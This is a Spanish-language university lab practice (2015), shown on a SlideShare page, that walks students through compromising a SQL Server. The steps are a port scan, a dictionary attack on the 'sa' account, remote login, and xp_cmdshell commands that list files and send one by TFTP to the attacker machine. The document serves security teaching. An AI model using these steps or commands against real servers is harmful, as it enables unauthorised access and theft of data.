SlideShare una empresa de Scribd logo
1 de 6
Descargar para leer sin conexión
Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Instituto Tecnológico de San Juan del Río
PRÁCTICA 1:
SQL Server
P R E S E N T A:
Ruiz Arrazola María del Carmen 12590172
P R O F E S O R (A):
Rojo López Ariopajita
San Juan del Río, Qro., Abril de 2015
Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
SQL Server
 Objetivos
 Identificar la presencia de un servidor SQL Server mediante el uso de software de scanner
de puertos.
 Efectuar un ataque por diccionario para encontrar la contraseña de la cuenta “sa”.
 Conectarse y controlar en forma remota el servidor.
 Instalar un servidor TFTP en la computadora atacante.
 Ejecutar comandos del sistema operativo desde SQL Server.
Introducción:
Basado en pruebas de infiltración reales que hemos efectuado sobre nuestros clientes desde
internet. La metodología también es muy similar a la usada para hackear a Microsoft cuando le
robaron parte del código fuente de Windows XP. En este incidente, uno de los programadores de
bases de datos tenía una contraseña sencilla en su equipo, que fue explotada por los atacantes como
se describe a continuación.
 Material y equipo necesario
 1Computadora con windows
 Conectar a la red de internet
 Metodología
Fase 1.
En este ejercicio, se instalará y ejecutará el software Superscan para identificar el puerto TCP
abierto que indica la presencia de un servidor SQL activo en la red.
1-Instalar superscan.exe
Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
2.- Ejecutar superscan y anotar la direccíon del servidor mysql 127.0.0.1
Esta dirección debe ser la misma en los campos IP Start y Stop.
En Scan Type, seleccione All list ports from 1-5000.
3.- Iniciar el SCANNER.
4.- Comprobar que el scanner identifica correctamente el puerto 1433.
Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Fase 2.
En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para
encontrar la contraseña de acceso de la cuenta administrativa “sa”.
1.- Ejecute el programa sqldict.exe.
2.-En el campo Target server IP, introduzca 127.0.0.1
3.-En el campo Target Account, asegúrese que se encuentra sa por default.
4.-Seleccione Load Password File
5.-Navegue a su USB, localice y seleccione el archivo passwords.txt.
Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Fase 3.
En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a
un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener
el control total del servidor de bases de datos, en forma remota y con privilegios administrativos.
Tarea Pasos Detallados
1. Configurar la herramienta
Enterprise Manager,
conectarse al servidor y
controlarlo en forma remota.
a. Ejecute la herramienta administrativa Management
Studio en el menú Start | Programs | Microsoft
SQL Server 2005 | SQL Server Management
Studio Express
b. En Nombre de servidor, introduzca 192.168.1.100
c. En Autenticación, seleccione Autenticación de
SQL Server. Introduzca la cuenta sa, con la
contraseña que crackeo en el ejercicio anterior. Haga
click en Conectar.
Fase 4.
En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la
recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema
operativo Windows contiene un cliente TFTP, pero no el componente servidor.
Tarea Pasos Detallados
1. Instalar un servidor TFTP a. Inserte la memoria USB.
b. Abra el explorador de Windows, y navegue a la
ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL
c. Ejecute el software instalador de TFTP Server,
SolarWinds-TFTP-Server.exe, aceptando las
opciones por default que presenta el asistente. Si le
solicita el CD de instalación de Microsoft Office,
presione Cancelar.
d. En la opción File – Configure, seleccione la pestaña
Security, activando la opción “Transmit and
Receive files”. Presione “OK”.
Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Fase 5.
En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al
servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este
escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir
hacia la computadora atacante.
Tarea Pasos Detallados
1. Conectarse al servidor
remoto
a. En SQL Server Management Studio, selecciona
Nueva consulta.
2. Ejecutar el extended stored
procedure xp_cmdshell para
buscar y transferir un
archivo hacia el hacker
a. En la ventana de consultas, introduzca y ejecute el
siguiente comando para localizar cualquier archivo
de texto que usaremos como ejemplo.
xp_cmdshell ‘dir c:*.txt /s’
b. Active el servidor TFTP en la computadora atacante:
menú Start | Programs | SolarWinds 2001
Standard Edition | File Transfer | TFTP Server.
c. Transfiera el archivo encontrado hacia el equipo
cliente, ejecutando el siguiente stored procedure:
xp_cmdshell ‘tftp –i 192.168.1.# PUT path’
Sustituya # por el número de estudiante que usted tiene
asignado. Sustituya la palabra path por la ruta completa
del archivo encontrado en el punto “a”. Si la ruta
contiene espacios en blanco, necesita incluirla entre
comillas “ ”.
Por ejemplo, si el archivo que desea transferir es
c:program filestest.txt, ejecute:
xp_cmdshell ‘tftp -i 192.168.1.# PUT “c:program filestest.txt”’
d. Verifique que el archive se transfirió hacia la
computadora atacante, revisando el contenido del
directorio c:TFTP-root (el directorio que se
configure por default para enviar y recibir archives
por TFTP).

Más contenido relacionado

Similar a SQL Server: Práctica de hacking de base de datos

Saturacion base de datos - Ejemplos Parte 1
Saturacion base de datos  - Ejemplos Parte 1Saturacion base de datos  - Ejemplos Parte 1
Saturacion base de datos - Ejemplos Parte 1GrupoTresPacEspe
 
Framework .NET 3.5 09 Depuración, monitorización y pruebas
Framework .NET 3.5 09 Depuración, monitorización y pruebasFramework .NET 3.5 09 Depuración, monitorización y pruebas
Framework .NET 3.5 09 Depuración, monitorización y pruebasAntonio Palomares Sender
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaarbeycardona2
 
INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...
INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...
INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...Franklin Ramos
 
Actividad No. 1.7: Creación de usuarios en MySQL
Actividad No. 1.7: Creación de usuarios en MySQLActividad No. 1.7: Creación de usuarios en MySQL
Actividad No. 1.7: Creación de usuarios en MySQLFrancisco Medina
 
Documentación de pruebas del software
Documentación de pruebas del softwareDocumentación de pruebas del software
Documentación de pruebas del softwareLina Vega
 
Proyecto 6 Acceso a redes
Proyecto 6 Acceso a redesProyecto 6 Acceso a redes
Proyecto 6 Acceso a redesjavipiris
 
Preparando el entorno de Red de Oracle Database 11gZ052 06
Preparando el entorno de Red de Oracle Database 11gZ052 06Preparando el entorno de Red de Oracle Database 11gZ052 06
Preparando el entorno de Red de Oracle Database 11gZ052 06Alexander Calderón
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfisabellauruea
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfNicole633450
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfBrendaMorales762761
 
Desarrollo de habilidades de pensamiento.docx
Desarrollo de habilidades de pensamiento.docxDesarrollo de habilidades de pensamiento.docx
Desarrollo de habilidades de pensamiento.docxIsabelSofiaFernndezC
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfCritianMuozCaicedo
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfCamilaDuque32
 

Similar a SQL Server: Práctica de hacking de base de datos (20)

Saturacion base de datos - Ejemplos Parte 1
Saturacion base de datos  - Ejemplos Parte 1Saturacion base de datos  - Ejemplos Parte 1
Saturacion base de datos - Ejemplos Parte 1
 
MANUAL DESPLIEGUE SERVIDOR WEB
MANUAL DESPLIEGUE SERVIDOR WEBMANUAL DESPLIEGUE SERVIDOR WEB
MANUAL DESPLIEGUE SERVIDOR WEB
 
Computación 3 sb04003 2013
Computación 3 sb04003 2013Computación 3 sb04003 2013
Computación 3 sb04003 2013
 
Proxy
ProxyProxy
Proxy
 
Framework .NET 3.5 09 Depuración, monitorización y pruebas
Framework .NET 3.5 09 Depuración, monitorización y pruebasFramework .NET 3.5 09 Depuración, monitorización y pruebas
Framework .NET 3.5 09 Depuración, monitorización y pruebas
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
 
INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...
INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...
INSTALACIÓN Y CONFIGURACIÓN DE UN SERVIDOR SSH, PUTTY, APACHE Y MYSQL EN CENT...
 
Actividad No. 1.7: Creación de usuarios en MySQL
Actividad No. 1.7: Creación de usuarios en MySQLActividad No. 1.7: Creación de usuarios en MySQL
Actividad No. 1.7: Creación de usuarios en MySQL
 
Informe sseg
Informe ssegInforme sseg
Informe sseg
 
Computación 3
Computación 3Computación 3
Computación 3
 
Documentación de pruebas del software
Documentación de pruebas del softwareDocumentación de pruebas del software
Documentación de pruebas del software
 
Proyecto 6 Acceso a redes
Proyecto 6 Acceso a redesProyecto 6 Acceso a redes
Proyecto 6 Acceso a redes
 
Preparando el entorno de Red de Oracle Database 11gZ052 06
Preparando el entorno de Red de Oracle Database 11gZ052 06Preparando el entorno de Red de Oracle Database 11gZ052 06
Preparando el entorno de Red de Oracle Database 11gZ052 06
 
Computación 3
Computación 3Computación 3
Computación 3
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdf
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdf
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdf
 
Desarrollo de habilidades de pensamiento.docx
Desarrollo de habilidades de pensamiento.docxDesarrollo de habilidades de pensamiento.docx
Desarrollo de habilidades de pensamiento.docx
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdf
 
Desarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdfDesarrollo de habilidades de pensamiento.pdf
Desarrollo de habilidades de pensamiento.pdf
 

Último

Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxMaritzaRetamozoVera
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónLourdes Feria
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptxFelicitasAsuncionDia
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfAngélica Soledad Vega Ramírez
 
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxjosetrinidadchavez
 
Identificación de componentes Hardware del PC
Identificación de componentes Hardware del PCIdentificación de componentes Hardware del PC
Identificación de componentes Hardware del PCCesarFernandez937857
 
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptxEXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptxPryhaSalam
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfDemetrio Ccesa Rayme
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzprofefilete
 
la unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscala unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscaeliseo91
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosCesarFernandez937857
 
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptxTECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptxKarlaMassielMartinez
 
TEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOS
TEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOSTEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOS
TEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOSjlorentemartos
 
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...JAVIER SOLIS NOYOLA
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuaDANNYISAACCARVAJALGA
 
Qué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaQué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaDecaunlz
 

Último (20)

Sesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docxSesión de aprendizaje Planifica Textos argumentativo.docx
Sesión de aprendizaje Planifica Textos argumentativo.docx
 
Medición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptxMedición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptx
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
Registro Auxiliar - Primaria 2024 (1).pptx
Registro Auxiliar - Primaria  2024 (1).pptxRegistro Auxiliar - Primaria  2024 (1).pptx
Registro Auxiliar - Primaria 2024 (1).pptx
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
 
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
 
Power Point: "Defendamos la verdad".pptx
Power Point: "Defendamos la verdad".pptxPower Point: "Defendamos la verdad".pptx
Power Point: "Defendamos la verdad".pptx
 
Identificación de componentes Hardware del PC
Identificación de componentes Hardware del PCIdentificación de componentes Hardware del PC
Identificación de componentes Hardware del PC
 
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptxEXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdf
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
 
la unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscala unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fisca
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos Básicos
 
Presentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza MultigradoPresentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza Multigrado
 
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptxTECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
TECNOLOGÍA FARMACEUTICA OPERACIONES UNITARIAS.pptx
 
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdfTema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
Tema 8.- PROTECCION DE LOS SISTEMAS DE INFORMACIÓN.pdf
 
TEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOS
TEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOSTEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOS
TEMA 13 ESPAÑA EN DEMOCRACIA:DISTINTOS GOBIERNOS
 
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
ACERTIJO DE LA BANDERA OLÍMPICA CON ECUACIONES DE LA CIRCUNFERENCIA. Por JAVI...
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahua
 
Qué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativaQué es la Inteligencia artificial generativa
Qué es la Inteligencia artificial generativa
 

SQL Server: Práctica de hacking de base de datos

  • 1. Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico de San Juan del Río Instituto Tecnológico de San Juan del Río PRÁCTICA 1: SQL Server P R E S E N T A: Ruiz Arrazola María del Carmen 12590172 P R O F E S O R (A): Rojo López Ariopajita San Juan del Río, Qro., Abril de 2015
  • 2. Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx SQL Server  Objetivos  Identificar la presencia de un servidor SQL Server mediante el uso de software de scanner de puertos.  Efectuar un ataque por diccionario para encontrar la contraseña de la cuenta “sa”.  Conectarse y controlar en forma remota el servidor.  Instalar un servidor TFTP en la computadora atacante.  Ejecutar comandos del sistema operativo desde SQL Server. Introducción: Basado en pruebas de infiltración reales que hemos efectuado sobre nuestros clientes desde internet. La metodología también es muy similar a la usada para hackear a Microsoft cuando le robaron parte del código fuente de Windows XP. En este incidente, uno de los programadores de bases de datos tenía una contraseña sencilla en su equipo, que fue explotada por los atacantes como se describe a continuación.  Material y equipo necesario  1Computadora con windows  Conectar a la red de internet  Metodología Fase 1. En este ejercicio, se instalará y ejecutará el software Superscan para identificar el puerto TCP abierto que indica la presencia de un servidor SQL activo en la red. 1-Instalar superscan.exe
  • 3. Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico de San Juan del Río 2.- Ejecutar superscan y anotar la direccíon del servidor mysql 127.0.0.1 Esta dirección debe ser la misma en los campos IP Start y Stop. En Scan Type, seleccione All list ports from 1-5000. 3.- Iniciar el SCANNER. 4.- Comprobar que el scanner identifica correctamente el puerto 1433.
  • 4. Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico de San Juan del Río Fase 2. En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para encontrar la contraseña de acceso de la cuenta administrativa “sa”. 1.- Ejecute el programa sqldict.exe. 2.-En el campo Target server IP, introduzca 127.0.0.1 3.-En el campo Target Account, asegúrese que se encuentra sa por default. 4.-Seleccione Load Password File 5.-Navegue a su USB, localice y seleccione el archivo passwords.txt.
  • 5. Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico de San Juan del Río Fase 3. En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener el control total del servidor de bases de datos, en forma remota y con privilegios administrativos. Tarea Pasos Detallados 1. Configurar la herramienta Enterprise Manager, conectarse al servidor y controlarlo en forma remota. a. Ejecute la herramienta administrativa Management Studio en el menú Start | Programs | Microsoft SQL Server 2005 | SQL Server Management Studio Express b. En Nombre de servidor, introduzca 192.168.1.100 c. En Autenticación, seleccione Autenticación de SQL Server. Introduzca la cuenta sa, con la contraseña que crackeo en el ejercicio anterior. Haga click en Conectar. Fase 4. En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema operativo Windows contiene un cliente TFTP, pero no el componente servidor. Tarea Pasos Detallados 1. Instalar un servidor TFTP a. Inserte la memoria USB. b. Abra el explorador de Windows, y navegue a la ubicación del software TFTP Server: Carpeta HERRAMIENTAS SQL c. Ejecute el software instalador de TFTP Server, SolarWinds-TFTP-Server.exe, aceptando las opciones por default que presenta el asistente. Si le solicita el CD de instalación de Microsoft Office, presione Cancelar. d. En la opción File – Configure, seleccione la pestaña Security, activando la opción “Transmit and Receive files”. Presione “OK”.
  • 6. Av. Tecnológico No. 2, Col. Centro, C.P. 76800 San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123 www.itsanjuan.edu.mx TECNOLÓGICO NACIONAL DE MÉXICO Instituto Tecnológico de San Juan del Río Fase 5. En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir hacia la computadora atacante. Tarea Pasos Detallados 1. Conectarse al servidor remoto a. En SQL Server Management Studio, selecciona Nueva consulta. 2. Ejecutar el extended stored procedure xp_cmdshell para buscar y transferir un archivo hacia el hacker a. En la ventana de consultas, introduzca y ejecute el siguiente comando para localizar cualquier archivo de texto que usaremos como ejemplo. xp_cmdshell ‘dir c:*.txt /s’ b. Active el servidor TFTP en la computadora atacante: menú Start | Programs | SolarWinds 2001 Standard Edition | File Transfer | TFTP Server. c. Transfiera el archivo encontrado hacia el equipo cliente, ejecutando el siguiente stored procedure: xp_cmdshell ‘tftp –i 192.168.1.# PUT path’ Sustituya # por el número de estudiante que usted tiene asignado. Sustituya la palabra path por la ruta completa del archivo encontrado en el punto “a”. Si la ruta contiene espacios en blanco, necesita incluirla entre comillas “ ”. Por ejemplo, si el archivo que desea transferir es c:program filestest.txt, ejecute: xp_cmdshell ‘tftp -i 192.168.1.# PUT “c:program filestest.txt”’ d. Verifique que el archive se transfirió hacia la computadora atacante, revisando el contenido del directorio c:TFTP-root (el directorio que se configure por default para enviar y recibir archives por TFTP).